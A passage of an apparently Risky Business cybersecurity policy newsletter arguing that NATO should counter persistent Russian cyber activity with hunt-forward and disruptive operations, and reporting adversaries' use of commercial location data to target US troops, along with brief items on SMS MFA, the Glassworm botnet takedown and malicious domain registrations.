https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/06/data-src-image-b16e43dc-0844-4c1e-af72-1014fe731d04.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-b16e43dc-0844-4c1e-af72-1014fe731d04.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">NATO headquarters, NATO</span></figcaption></figure><p>Last week, The Grugq and I travelled to Estonia for <a href="https://web.cvent.com/event/3854aac7-2949-4c96-a08e-2ffa236e4505/websitePage:41832d27-306a-427f-966f-7e6932d0eb00"><u>CyCon</u></a>, <a href="https://ccdcoe.org"><u>NATO CCDCOE&apos;s</u></a> conference on Cyber Conflict. Our biggest takeaway from the conversations we had there is that NATO, unsurprisingly, is well prepared for one-off, large-scale military attacks. But it is failing to counter small, unremitting cyberattacks, and this needs to change.</p><p>NATO was created to deter the Soviet Union from military aggression. It still defines itself as <a href="https://www.nato.int/en/what-we-do/deterrence-and-defence"><u>a defensive alliance</u></a> that can deliver a &quot;<a href="https://www.nato.int/en/what-we-do/deterrence-and-defence/strengthening-natos-eastern-flank"><u>resounding response</u></a>&quot; in the event of an unlikely but devastating Russian military attack.&#xA0;&#xA0;</p><p>Russian <a href="https://www.reuters.com/sustainability/climate-energy/massive-cyberattack-polish-power-system-december-failed-minister-says-2026-01-13/"><u>cyber operations</u></a>, however, <a href="https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q4-2025-q1-2026/"><u>are continuous</u></a> and <a href="https://www.justice.gov/usao-edpa/pr/justice-department-conducts-court-authorized-disruption-dns-hijacking-network"><u>conducted</u></a> <a href="https://cyberscoop.com/fbi-cisa-issue-psa-on-russian-intelligence-campaign-to-target-messaging-apps/"><u>well below</u></a> <a href="https://therecord.media/italy-blames-russia-linked-hackers-winter-games-cyberattack"><u>the threshold</u></a> of armed conflict. Individual operations just aren&apos;t damaging enough to attract a robust response. These continuous aggressive incursions are favoured by states like Russia and China as a way to harass their adversaries during peacetime.&#xA0;</p><p>The Americans think the right way to respond to cyber campaigns is &quot;<a href="https://www.cybercom.mil/Media/News/Article/3198878/cyber-101-defend-forward-and-persistent-engagement/"><u>persistent engagement</u></a>&quot;. US Cyber Command says that under this framework &quot;cyber operators constantly work to intercept and halt cyber threats, degrade the capabilities and networks of adversaries, and continuously strengthen the cybersecurity of the Department of Defense&quot;.&#xA0;</p><p>That&apos;s pretty much the opposite of NATO&apos;s prepare-to-strike-back-decisively paradigm.&#xA0;</p><p>Russia is taking advantage of this gap, sprinkling some cyber elements into its EU-focussed <a href="https://www.csis.org/analysis/russias-shadow-war-against-west"><u>sabotage campaign</u></a>. The campaign has resulted in real-world effects like <a href="https://www.dw.com/en/germany-fire-breaks-out-at-berlin-metal-factory/a-68992842"><u>fires at defence manufacturing plants</u></a> and <a href="https://www.politico.eu/article/nato-official-confirms-russian-plot-kill-european-weapons-chief-armin-papperger/"><u>assassination plots</u></a>. Despite the limited role of cyber operations in these attacks, the overwhelming vibe we got during CyCon was that NATO knows it must get better at contesting Russian cyber activities. It also knows it should respond with its <em>own</em> cyber operations.&#xA0;</p><p>One option here is for NATO to run more <a href="https://archive.md/x6wiL"><u>&quot;hunt forward&quot; operations</u></a> in member states and to make this activity less US-centric. In these operations, a more capable partner gets invited into a host country&apos;s networks to find and disrupt adversary activity. These were pioneered by US Cyber Command, which has spearheaded most of these actions over the last several years and have a <a href="https://taskandpurpose.com/news/cyber-command-security-hunt-forward/"><u>track record</u></a> of rooting out adversary malware.&#xA0;</p><p>But not all NATO countries trust the Americans with access to their sensitive networks. Even back in 2023, French General Aymeric Bonnemaison, then head of France&apos;s Cyber Defense Command, <a href="https://www.lemonde.fr/international/article/2023/01/13/defense-les-interrogations-de-l-etat-major-francais-face-aux-operations-cyber-americaines-en-europe_6157724_3210.html"><u>was concerned</u></a> about these missions exposing host countries to US intelligence gathering. That feels like a lifetime ago and we don&apos;t imagine that <a href="https://en.wikipedia.org/wiki/Proposed_United_States_acquisition_of_Greenland"><u>events</u></a> <a href="https://www.bbc.com/news/articles/czx82j5wd8vo"><u>since</u></a> <a href="https://www.theguardian.com/world/2026/apr/01/trump-says-he-is-absolutely-considering-withdrawing-us-from-nato"><u>then</u></a> have <a href="https://www.nytimes.com/2025/03/03/us/politics/trump-ukraine-military-aid.html"><u>given allies</u></a> the warm fuzzies about US intentions.&#xA0;</p><p>So there are good reasons that some of the more cyber-savvy countries should run their own hunt forward programs within NATO. There is precedence for this, and in 2023 the UK said that it <a href="https://therecord.media/uk-hunt-forward-operations-lt-gen-tom-copinger-symes"><u>has already conducted</u></a> hunt forward operations of its own.&#xA0;</p><p>We also got the impression that there is the political appetite for a small number of NATO countries to engage in even more aggressive cyber operations. As for what to target? In our view, the most problematic activity affecting NATO countries is the Russian sabotage campaign we previously discussed. That campaign appears to be run by units within the GRU, Russian military intelligence.&#xA0;</p><p>Cyber operations are obviously not the only way to strike at this activity. There are lots of real-world actions that could also have an impact, such as sanctions, expulsions, and denying visa applications to spies. But we think throwing a bit of cyber-enabled disruption in the GRU&apos;s direction would be worthwhile.</p><p>NATO may not be the <em>best</em> organisation to rally a member state cyber campaign, given its history as an organisation built to deter real-world military conflict. But it is the security organisation that Europe already has, so it&apos;s time to make the best of it.&#xA0;&#xA0;</p><h2 id="commercial-location-data-used-to-target-us-soldiers">Commercial Location Data Used to Target US Soldiers</h2><p>US military personnel in war zones have been targeted using commercially available geolocation data. We are totally unsurprised.</p><p>We&apos;ve written <a href="https://news.risky.biz/srsly-risky-biz-it-is-time-to-ban-sale-of-precise-geolocation/"><u>many times</u></a> about how <a href="https://news.risky.biz/why-the-german-military-use-of-webex/#data-broker-order-is-the-best-band-aid-available"><u>the collection</u></a>, collation, and <a href="https://news.risky.biz/srsly-risky-biz-thursday-july-29-65c0eb42a0e6da001a37e021/#let-he-who-is-without-sin-"><u>sale of geolocation data</u></a> is a national security risk for the United States and <a href="https://news.risky.biz/the-cyber-regime-change-pipe-dream/#usas-leaky-adtech-is-everyones-problem"><u>indeed any country</u></a> exposed to America&apos;s digital advertising ecosystem.</p><p>Last week, we learned that US Central Command (CENTCOM) had admitted it has &quot;received multiple threat reports concerning adversary exploitation of commercial location data to target or surveil US personnel in theater&quot;. CENTCOM&apos;s <a href="https://www.centcom.mil/AREA-OF-RESPONSIBILITY/"><u>area of responsibility</u></a> includes the Persian Gulf where the US has been fighting Iran.&#xA0;</p><p>This disclosure of geolocation-based targeting was <a href="https://www.documentcloud.org/documents/28168364-ron-wydens-may-28-2026-letter-to-the-department-of-defense/"><u>contained in a letter</u></a> to the Department of Defense (DoD) from a bipartisan group of legislators. It <a href="https://www.reuters.com/business/media-telecom/pentagon-says-us-military-personnel-are-reportedly-being-targeted-using-location-2026-05-28/"><u>was provided to</u></a> <em>Reuters </em>by Senator Ron Wyden.&#xA0;</p><p>The letter notes that:&#xA0;</p><blockquote>Commercial location data can be used to identify where US troops congregate and their pattern of life, which can be exploited by adversaries to target attacks such as missiles, drones, and roadside bombs, as well as for counterintelligence purposes.</blockquote><p>That&apos;s a good description of some of the risks. The letter also says this is the first time the DoD has confirmed that commercial location data is being used to target US military personnel in a war zone.&#xA0;</p><p>That doesn&apos;t mean America&apos;s adversaries haven&apos;t already been using this data for other purposes. If Iran is doing this in wartime, you can bet that China is doing it in peacetime in its intelligence and counterespionage programs. Using commercial data in those types of activities is stealthy. Now the USA is involved in a hot war, the consequences of this data being easily available are <a href="https://edition.cnn.com/2026/03/02/politics/six-soldiers-killed-in-iranian-strike-kuwait"><u>far more visible</u></a>.&#xA0;</p><p>The DoD has policies designed to mitigate the risks posed by commercially available location data. They do not fill us with confidence. They talk about measures like disabling geolocation features and resetting Advertising IDs on work phones. That makes it harder to track individual devices over time, but even <a href="https://support.google.com/googleplay/android-developer/answer/6048248?hl=en#zippy=%2Cpersistent-identifiers%2Ctargeting-devices-without-an-advertising-id%2Cadvertising-id-violations%2Creset-your-devices-advertising-id%2Cdelete-your-devices-advertising-id"><u>Google</u></a> acknowledges that even without an Advertising ID &quot;persistent identifiers are still available&quot;.</p><p>It&apos;s not that policies like these are <em>bad</em>, so much as unrealistic. They&apos;re hard to implement and incomplete, especially given that service members and their families can also use personal phones.&#xA0;</p><p>One view of the internet is it&apos;s a machine designed to track people across the planet in order to advertise to them. How effective can on-device options be when the broader ecosystem has tracking in mind and sites use techniques such as <a href="https://workos.com/guide/device-fingerprinting"><u>device fingerprinting</u></a> that are designed to circumvent on-device protections?&#xA0;</p><p>Part of the solution <em>will</em> be good DoD policies with sensible defaults and better controls over end devices. But clamping down on the type and amount of data that can legally be collected and sold must be part of the solution.</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>Microsoft ditches SMS MFA:</strong> <a href="https://support.microsoft.com/en-us/accounts-billing/manage/microsoft-to-stop-sending-sms-codes-for-personal-accounts"><u>Microsoft is removing SMS</u></a> as an authentication and account recovery option for personal accounts. The company said that SMS-based authentication was one of the most targeted vectors for account takeover and subverting it was now a leading source of fraud. Users will be prompted to create a passkey when signing in. <em>Risky Bulletin</em> has <a href="https://news.risky.biz/risky-bulletin-microsoft-ends-sms-mfa-for-personal-accounts/"><u>further coverage</u></a>.&#xA0;</li><li><strong>Glassworm botnet disruption: </strong>CrowdStrike, in collaboration with Google and the Shadowserver foundation <a href="https://www.crowdstrike.com/en-us/blog/inside-crowdstrike-takedown-of-a-developer-targeting-botnet/"><u>have taken down</u></a> the botnet. Glassworm was&#xA0; a self-propagating, credential-stealing botnet that targeted developers and spread by malicious software packages. The disruption effort targeted the <em>four </em>different command and control channels that Glassroom used which involved the Solana blockchain, BitTorrent, the Google calendar service and VPS hosted infrastructure. <em>The Register</em> has <a href="https://www.theregister.com/cyber-crime/2026/05/27/crowdstrike-google-shatter-glassworm-botnet/5247337"><u>further coverage</u></a>.&#xA0;</li><li><strong>IBM announces USD$5 billion for open source software:</strong> IBM <a href="https://newsroom.ibm.com/2026-05-28-ibm-and-red-hat-commit-5-billion-to-redefine-the-future-of-open-source-in-the-ai-era"><u>has announced</u></a> an effort to find and fix vulnerabilities in open source software that it is calling <a href="https://www.ibm.com/products/lightwell"><u>Project Lightwell</u></a>. It says the effort will involve 20,000 engineers assisted by AI tools.&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, Casey Ellis chats with Truffle Security&#x2019;s founder and CEO Dylan Ayrey about the recent CISA secrets leak. Days after Brian Krebs ran the story, plenty of the exposed credentials were still live, including an admin-level GitHub app key with full rights over CISA&#x2019;s org.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI130.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI130/&quot;&gt;Sponsored: Inside CISA&apos;s disastrous secrets leak&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 19:10 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Inside CISA&apos;s disastrous secrets leak&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> talk about the ways in which intelligence agencies are like cults.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN168.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN168/&quot;&gt;Between Two Nerds: The intelligence cult&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 27:55 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: The intelligence cult&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/x4hK12prjd8?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: The intelligence cult"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>A tenth of all new domains last year were malicious: </strong>One in every ten new domains registered in 2025 were linked to malicious activity and were eventually added to one or more cybersecurity blocklists.</p><p>A total of 84,961,989 domains were created last year and 8,496,811 were later added to a blocklist, according to an <a href="https://interisle.net/insights/cybercriminaldomaindemand"><u>Interisle report</u></a> published on Monday.</p><p>Researchers believe the actual number of malicious domains may be double that, at around 16.8 million, with new domains expected to be blacklisted once they are deployed in operations in the wild later on.</p><p>[<a href="https://news.risky.biz/risky-bulletin-a-tenth-of-all-new-domains-last-year-were-malicious/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Russia greatly expands SORM surveillance requirements: </strong>The Russian government has greatly expanded the amount of personal and technical data that mobile operators and 